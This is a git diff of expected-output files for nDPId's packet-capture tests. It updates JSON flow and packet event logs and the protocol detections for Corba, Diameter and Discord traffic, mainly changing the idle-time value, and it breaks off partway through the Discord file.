+00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020789,"flow_last_seen":1614768020789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020789,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="} 
+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"} 
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":22,"total-skipped-flows":0,"total-l4-data-len":2397,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1614768020795} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 25/22 diff --git a/test/results/diameter.pcap.out b/test/results/diameter.pcap.out index 51f7c4c3e..acf7b7fec 100644 --- a/test/results/diameter.pcap.out +++ b/test/results/diameter.pcap.out 
@@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"diameter.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1263278878271} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 
-00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} -00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 
+00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} +00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":1656,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1263278878357} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 diff --git a/test/results/discord.pcap.out b/test/results/discord.pcap.out index 0e424955e..44b894cff 100644 --- a/test/results/discord.pcap.out +++ b/test/results/discord.pcap.out 
@@ -1,12 +1,12 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"discord.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":42193,"flow_last_seen":42193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":42193,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="} -00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="} 